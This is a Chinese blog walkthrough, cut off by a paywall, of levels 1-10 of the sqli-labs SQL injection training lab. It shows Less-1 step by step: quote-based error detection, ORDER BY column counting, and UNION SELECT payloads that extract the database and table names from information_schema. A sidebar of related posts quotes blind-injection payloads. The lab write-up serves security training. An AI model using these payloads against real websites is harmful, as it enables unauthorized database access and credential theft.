sqlilabs靶场通关详细过程(1-10)

最新推荐文章于 2025-04-11 11:00:30 发布
最新推荐文章于 2025-04-11 11:00:30 发布
阅读量935 收藏 21
点赞数 14
文章标签: sql mybatis 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/pricrl/article/details/140108433
版权

解题思路

1,判断有无注入点

2,判断数据库类型

3,判断回显点

4,利用所收集内容进行暴库,暴表,暴列,暴账号密码

Less-1~4 为GET 传参,根据报错信息判断注入类型,再进行注入

Less-1

单引号字符型注入

1.判断注入点

先输入正常的参数

? id=1

尝试注入单个引号闭合,网页回显报错,说明存在注入 漏洞

? id=1'

接下来加个注释,把 SQL 语句后面的内容注释,网页回显了正确的信息。也就是说我们注入的单引号起到了一个闭合的作用,这是一个字符型注入。

? id=1' --+

2.获取数据库信息

判断表有几列,使用 order by 子句进行一个查询 ,order by 后面加数字进行尝试,发现超过3就报错,说明有三列。 

? id=1' order by 3 --+

接下来判断哪些列是我们能用的,令 id 参数查询不到结果,使用 UNION 进行组合查询。网页回显了数字 2 和 3,说明第 2 列 和 第 3 列是我们可用的。

? id=99' union select 1,2,3 --+

爆数据库名,我们选择第 2 个位置作为显示位。使用 database() 函数回显当前数据库,进行查询,结果为数据库名是 'security'。

? id=99' union select 1,database(),3 --+

爆表名,在 information_schema.table 进行查询,使用 group_concat() 函数合并查询结果

?id=99' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema='security'--+

爆表的字段,在 information_schema.columns 爆出来,我们猜测账号密码在users表中,所以 直接爆users表的字段

?id=99' union select 1,g

最低0.47元/天 解锁文章
pricrl
关注
Sqli-labs靶场通关1-20关)
2301_77977773的博客
07-03 985
为了不影响 80 端口的服务,我们可以设置 Apache 服务的端口为82这是因为主机本身已经存在 MySQL 服务,我们可以不使用 php-study 配置中的 MySQL,就用主机本身即可,但版本可能需要注意,我这里使用的 5.7.351.安装sqli-labs-master到phpstudy_pro中的WWW/目录下2.修改phpstudy_pro\WWW\sqli-labs-master\sql-connections的db-creds.inc文件。
sqlilabs靶场通关详细过程(11-22)
pricrl的博客
07-02 1482
现在使用我们的sqlmap。
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 4130
sqli-labs靶场通关(1-10)
sqli-labs靶场通关攻略(1-20关)
kknifek的博客
08-14 1489
sql手工注入
sqlilabs靶场:less-6--less-10
2302_80256359的博客
12-05 903
那么我们可以考虑"绝招"---》延时注入 ,其利⽤条件较为苛刻,这种情况我们可以利用时间函数来判断数据有没有在⽬标数据中得到执行,当然也需要构造闭合......最后得出四张表的名称分别为emails,referers,uagents,users。得知数据表的三个字段分别为id,username,password。通过BP抓包得知四个数据表的表名长度分别为6,8,7,5。通过时间注入得知四张表的长度分别为6,8,7,5。通过BP爆破得知三个字段的长度分别为2,8,8。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 18万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-优快云博客_sql注入数据包 ​...
sqli-labs靶场通关攻略(1-75)
shw_yzh的博客
08-14 1252
sqli-labs靶场超级细通关攻略
sqli-labs靶场通关攻略(21-30关)
shw_yzh的博客
08-26 1035
可以看见这里返回了很多信息,包括了自己的Cookie。但是Cookie却是一串奇怪的字符串,看得出来这是bse64编码。解码查看。
sqli-labs 靶场通关1-10
知世郎
10-15 2821
第七关当在输入id=1,页面显示you are in... 当我们输入id=1'时显示报错,但是没有报错信息,这和我们之前的关卡不一样,之前都有报错信息。然后我输入id=1'--+时报错,这时候我们可以输入id=1')--+发现依然报错,之时我试试是不是双括号输入id=1'))--+,发现页面显示正常。id=1' and ascii(substr(database(),1,1))=115 -- qwe //正常 库名首字母ascii码115所对应的字母是s。id=2'的时候看到页面报错信息。
sqli-labs靶场通关攻略 16-20
2301_82061181的博客
08-21 1025
步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater。步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater。步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater。步骤一:判断闭合方式为admin") and 1=1#步骤二:在passwd=admin后输入'报错。
sqli-labs】sqli-labs 靶场通关1-16)
m0_71944965的博客
09-02 615
🏘️个人主页: 点燃银河尽头的篝火(●’◡’●) 如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦 【靶场sqli-labs 靶场通关1-16)sqli-labs第一关 sqli-labs第一关 输入?id=1 正常 输入?id=1' 报错 输入?id=1'--+ 正常 判断有注入点且闭合方式是 ’ 使用and ‘1’='1判断他为字符型注入 ?id=1' order by 3--+ 正常 ?id=1' order by 4--+ 报错 判断回显位有三个。 id=0
SQL注入:sqli-labs靶场通关1-5关)
kobelnfn的博客
12-27 1059
我的sqli-labs靶场学习经验分享
Sqli-labs靶场详细攻略Less 29-33
qq_41755084的博客
10-27 1728
这一关在web应用前有一个waf,在关卡列表界面直接点开是没有的,要在地址栏输入才是有waf保护的界面其实这里并不是真正的硬件waf,只是有两个函数模拟了waf的功能和收到参数的反应。sqlilabs靶场也提供了能够部署真正硬件waf的代码,不过随着时代的发展,waf也在变化,专门配置这样一个waf也没太有必要,直接使用这个模拟题目的就好了。这一关在正常配置waf的情况下,的结构图如下所示客户端在访问服务器端时,需要先经过一个tomcat服务器,这个tomcat服务器中部署的过滤代码充当了waf。
Windows的WSL中的Docker启动Postgresql如何对外暴露端口号
wangqinyangx的博客
04-08 922
比较常用的场景,记录一下。个人博客:qinyangx.top。
在 macOS 上连接 PostgreSQL 数据库(pgAdmin、DBeaver)
西京刀客
04-08 307
在 macOS 上连接 PostgreSQL 数据库
数据库数据恢复——sql server数据库被加密怎么恢复数据
beiya123的博客
04-11 235
SQL server数据库数据故障: SQL server数据库被加密,无法使用。 数据库MDF、LDF、log日志文件名字被篡改。 数据库备份被加密,文件名字被篡改。
SQL:单表查询基础
最新发布
2402_88047672的博客
04-11 579
WHERE。
Docker与PostgreSQL
Z451835239的博客
04-10 847
容器化的PostgreSQL:将PostgreSQL容器化可以帮助开发人员更快地构建、部署和扩展PostgreSQL,从而提高应用程序的可靠性和性能。微服务架构:Docker和PostgreSQL可以帮助开发人员构建微服务架构,从而提高应用程序的可扩展性和可维护性。多云部署:Docker和PostgreSQL可以帮助开发人员实现多云部署,从而提高应用程序的可靠性和安全性。数据迁移:将现有的PostgreSQL数据迁移到Docker容器中可能是一项复杂的任务,需要开发人员具备一定的技能和经验。
Spark大数据分析与实战笔记(第四章 Spark SQL结构化数据文件处理-04)
想你依然心痛的博客
04-09 2144
当Case类不能提前定义的时候,就需要采用编程方式定义Schema信息,实现RDD转换DataFrame的功能主要包含3个步骤,具体如下:1.创建一个Row对象结构的RDD;2.基于StructType类型创建Schema;3.通过SparkSession提供的createDataFrame()方法来拼接Schema。根据上述步骤,创建SparkSqISchema.scala文件,使用编程方式定义Schema信息的具体代码如下所示。//1.创建SparkSession。
sqli-labs靶场通关详解51-55
08-30
Sqli-Labs靶场是一系列用于练习和测试SQL注入技巧的安全教育平台。从第51关到第55关,可能会涉及到一些高级的SQL注入技术: 51. 关卡可能涉及基本的盲注(如时间延迟或错误消息观察),你需要通过构造特定的SQL查询...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值